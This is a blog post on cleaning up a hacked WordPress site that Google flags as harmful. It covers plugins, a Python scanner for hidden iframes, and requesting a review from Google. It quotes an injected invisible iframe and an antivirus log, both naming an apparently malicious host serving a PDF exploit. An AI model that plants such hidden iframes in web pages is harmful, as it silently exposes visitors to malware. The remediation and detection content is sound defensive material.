I run a website on SEO and recently it's acting weird, with the following messages in Google search results and when I access it. When I do a site:mywebsite.com search in Google, I get a message below the search result stating ‘This site may harm your computer.’, which is making me lose visitors, apart from which I am not able to access my website. What may be the problem? When I try to visit my website I get a message stating ‘Reported Attack Site!’ and it says that my website is trying to install programs which can steal private information or damage the visitors' computers, but I run a genuine information website and have no downloads nor any illegal material. What may be the solution for this problem, and is my website hacked? – Question by a Reader through Phone
First of all, you need to understand that these are badware warnings against malicious software, given by Google through stopbadware.org, which warn all Google searchers against visiting websites that can be harmful to them. You need to detect the malware and also visit the Google Safe Browsing section, which lists information about different websites and whether they were listed as suspicious in the last 90 days.
Sometimes, because of wrong permissions on your website scripts like WordPress, or when you have easy passwords for your FTP accounts, your websites can be compromised, after which the hackers add malicious links within your content or in the footer section, using direct links hidden with a visibility setting or else using iFrames. You need to continuously make sure that your website's content is secure and that no links have been placed by the hackers anywhere in the files on your FTP account.
Read this WordPress security guide, which can give you some important points to note while running a blog. Also, here are some plugins which you need to run on your WordPress blog so that you can regularly scan the content of your blog and all the plugin files and theme files.
My Experience :
Recently, after making a quick check on my blog, I found that there were some iframe codes added to my blog's homepage which I could not detect, but a friend, Anurag, messaged me about the same. The website was not accessible to him because his antivirus software ‘nod32’ detected it and disallowed him from accessing the website, with a virus message. His antivirus software even removed the virus which got downloaded to his PC, and then he received the following message:
HTTP filter file http://brugeni.net/p1d2f3.php?id=2038730&vis=1 PDF/Exploit.Pidief.OJS.Gen trojan connection terminated – quarantined Anurag\Ozakx Threat was detected upon access to web by the application: C:\Program Files\Mozilla Firefox\firefox.exe.
When I opened the footer.php & index.php files of my WordPress installation, I found the following iframe added at the end of the files, which is the reason the homepage was continuously loading like a loop and was also breaking the theme files. As a normal user, nobody can find this malicious code in the blog unless antivirus software finds it.
<iframe src="http://brugeni.net/?click=44E729" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
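One way to search theme files for injected iframes shaped like the one above (1 pixel in size or styled invisible). This is an added example, not part of the original post or of any plugin mentioned here; the function names, the sample file contents and the hosts video.example and injected.example are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path
from urllib.parse import urlparse

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")
HIDDEN_STYLE_RE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)
SCAN_SUFFIXES = {".php", ".html", ".htm", ".js"}

def parse_attrs(tag):
    """Return the tag's attributes as a dict with lowercase keys."""
    return {m.group(1).lower(): next(g for g in m.groups()[1:] if g is not None)
            for m in ATTR_RE.finditer(tag)}

def is_hidden(attrs):
    """True when the iframe is too small to see or is styled invisible."""
    def tiny(value):
        digits = re.match(r"\s*(\d+)", value or "")
        return bool(digits) and int(digits.group(1)) <= 1
    return (tiny(attrs.get("width")) or tiny(attrs.get("height"))
            or bool(HIDDEN_STYLE_RE.search(attrs.get("style", ""))))

def scan_tree(root, allowed_hosts=()):
    """Return (relative path, line number, iframe host) for each hidden iframe."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.suffix.lower() not in SCAN_SUFFIXES:
            continue
        text = path.read_text(encoding="utf-8", errors="replace")
        for m in IFRAME_RE.finditer(text):
            attrs = parse_attrs(m.group(0))
            host = urlparse(attrs.get("src", "")).hostname or ""
            if is_hidden(attrs) and host not in allowed_hosts:
                line = text.count("\n", 0, m.start()) + 1
                findings.append((path.relative_to(root).as_posix(), line, host))
    return findings

def demo(allowed_hosts=()):
    """Scan a constructed theme folder; all file contents and hosts are made up."""
    with tempfile.TemporaryDirectory() as tmp:
        theme = Path(tmp)
        (theme / "index.php").write_text(
            '<?php get_header(); ?>\n<iframe src="https://video.example/embed/1" '
            'width="560" height="315"></iframe>\n')
        (theme / "footer.php").write_text(
            '<?php wp_footer(); ?>\n</body>\n</html>\n<iframe src="http://injected.example/'
            '?click=0" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>\n')
        return scan_tree(theme, allowed_hosts)
```

Run scan_tree on a downloaded copy of your theme or wp-content folder and review every hit whose host you do not recognise. A pattern match like this only finds iframes written as plain HTML, so it complements an antivirus or plugin scan and does not replace one.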
Solution for Removing the iFrames :
There are several WordPress plugins which can help you stay secure by checking all the file permissions, blog content and your FTP files. Here are a few recommendations:
- WP Security Scan
Scans your WordPress installation for security vulnerabilities and suggests corrective actions. You need to install this plugin in your WordPress blog and then activate it, after which you will find a completely new menu called ‘WP – Security Admin Tools’. There you can find all the system information and links to the scanner, which shows the current permissions of the files under your root folder and the permissions you need to change for more security.
- WordPress admin protection/security
- Secure WP Plugin
This plugin is very useful because it does a lot of things, creating some pages which can be accessed by others and removing information from your website which others should not be allowed to access.
# removes error-information on login-page
# adds index.html to plugin-directory (virtual)
# removes the wp-version, except in admin-area
# removes Really Simple Discovery
# removes Windows Live Writer
# removes core update information for non-admins
# removes plugin-update information for non-admins
Steps to Remove the Warning :
Once the warning is shown for your website, expect 0% visitors for your website from Google, because the warning message will block visitors from entering the site. You need to get this warning removed by Google as soon as possible, and the very first step is to remove the malicious links, hackers' code or any other stuff which was the cause of this warning. Once you are sure that you have found the problem and removed that code, you need to proceed to the next step of contacting Google.
Log in to your Google Webmaster Tools account, which is also useful for regaining Google rankings. You need to make sure you have added your website in Webmaster Tools by confirming that you are the owner, either by adding the ‘Meta’ code or by uploading a file which it offers you. Once this is done, you need to perform the following 3 steps and wait for the Google Webmaster Team to review your website and confirm that it does not distribute or host badware.
1. On the Webmaster Tools Home page, select the site you want.
2. In the ‘Parts of this site may be distributing malware’ message, click More details.
3. Click Request a review.
Previously this procedure used to take a lot of time, but nowadays websites are reviewed and the warning is removed within a 2-3 day time frame. Let me know if you have any questions about this problem or if your website has been attacked with any problems of this kind.